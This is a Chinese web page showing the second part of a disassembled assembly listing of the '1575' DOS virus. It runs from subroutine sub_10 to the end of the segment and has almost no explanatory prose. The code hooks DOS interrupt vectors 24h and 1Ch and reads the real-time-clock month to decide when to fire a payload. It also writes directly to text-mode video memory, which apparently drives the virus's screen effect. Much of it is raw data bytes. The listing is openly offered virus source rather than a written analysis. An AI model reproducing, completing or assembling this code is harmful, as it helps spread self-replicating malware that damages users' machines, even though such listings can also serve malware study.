📄 1575病毒源程序分析(2) .txt
字号:
jz loc_31 ; Jump if zero
call sub_15 ; (065A)
dec byte ptr ds:data_6e
pop es
pop ds
pop di
pop si
data_35 db 5Dh
db 5Bh, 5Ah, 59h, 58h, 0C3h
loc_31:
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
sub_10 endp
db 0
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_11 proc near
push ax
push ds
pop ax
mov cs:data_28,ax
mov cs:data_27,dx
pop ax
retn
sub_11 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_12 proc near
push cs
mov al,0
out 20h,al ; port 20h, 8259-1 int command
mov ax,3524h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov ds:data_3e,bx
mov bx,es
mov ds:data_2e,bx
pop es
mov si,20Ah
mov di,219h
mov cx,0Fh
locloop_32:
lodsb ; String [si] to al
add al,20h ; ' '
stosb ; Store al to es:[di]
loop locloop_32 ; Loop if cx > 0
retn
sub_12 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_13 proc near
push ax
push cs
pop ds
push cs
pop es
mov bl,data_34
cmp bl,0Ch
ja loc_34 ; Jump if above
cmp bl,0
je loc_34 ; Jump if equal
mov al,8
out 70h,al ; port 70h, RTC addr/enabl NMI
; al = 8, month register
in al,71h ; port 71h, RTC clock/RAM data
cmp al,0Ch
ja loc_34 ; Jump if above
cmp al,0
je loc_34 ; Jump if equal
cmp al,bl
je loc_34 ; Jump if equal
inc bl
call sub_14 ; (064F)
cmp al,bl
je loc_34 ; Jump if equal
inc bl
call sub_14 ; (064F)
cmp al,bl
je loc_34 ; Jump if equal
pop ds
call sub_16 ; (0686)
push cs
pop ds
retn
;哌哌 External Entry into Subroutine 哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
sub_14:
cmp bl,0Ch
jbe loc_ret_33 ; Jump if below or =
sub bl,0Ch
loc_ret_33:
retn
loc_34:
pop ax
retn
sub_13 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_15 proc near
mov dx,673h
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
cmp byte ptr ds:[724h],43h ; 'C'
jne loc_35 ; Jump if not equal
call sub_3 ; (02AE)
jmp short loc_36 ; (0672)
db 90h
loc_35:
call sub_4 ; (0337)
loc_36:
push ds
sub_15 endp
;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
;
; External Entry Point
;
;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
int_24h_entry proc far
mov dx,data_33
mov ax,data_32
mov ds,ax
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
pop ds
retn
int_24h_entry endp
db 0B0h, 3, 0CFh
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_16 proc near
mov dx,6B0h
mov ax,251Ch
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov byte ptr ds:data_8e,90h
nop
mov ax,0B800h
mov es,ax
data_36 db 0BFh
data_37 dw 0FA0h
db 0B8h, 20h, 7, 0B9h, 0Bh, 0
db 0F2h, 0ABh, 0Eh, 7, 0C3h, 0
db 0, 0, 20h, 7, 0Fh
db 0Ah
data_38 db 0Fh
db 0Ah
data_39 db 0Fh
db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh
db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0F7h
db 0Eh, 0EEh, 0Ch, 90h, 0FBh, 50h
db 51h, 52h, 53h, 55h, 56h, 57h
db 1Eh, 6, 0Eh, 1Fh, 0EBh, 0Bh
db 90h
loc_37:
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
iret ; Interrupt return
sub_16 endp
db 0B8h, 0, 0B8h, 8Eh, 0C0h, 0E8h
db 2Bh, 0, 0BEh, 9Ah, 6, 0B9h
db 16h, 0, 0F2h, 0A4h, 80h, 3Eh
db 0AEh, 6, 0EEh, 74h, 8, 0C6h
db 6, 0AEh, 6, 0EEh, 0EBh, 6
db 90h
loc_38:
mov data_38,0F0h
loc_39:
mov ax,es:[di]
mov ah,0Eh
mov data_37,ax
mov data_36,0
jmp short loc_37 ; (06D0)
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_17 proc near
mov di,0
loc_40:
mov si,69Ch
push di
mov cx,12h
cld ; Clear direction
repe cmpsb ; Rept zf=1+cx>0 Cmp [si] to es:[di]
pop di
jz loc_41 ; Jump if zero
inc di
inc di
cmp di,0FA0h
jne loc_40 ; Jump if not equal
mov di,0
loc_41:
cmp di,0F9Eh
jne loc_ret_42 ; Jump if not equal
mov data_39,0CFh
loc_ret_42:
retn
sub_17 endp
db 43h, 0Ch, 0Ah
seg_a ends
end start
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -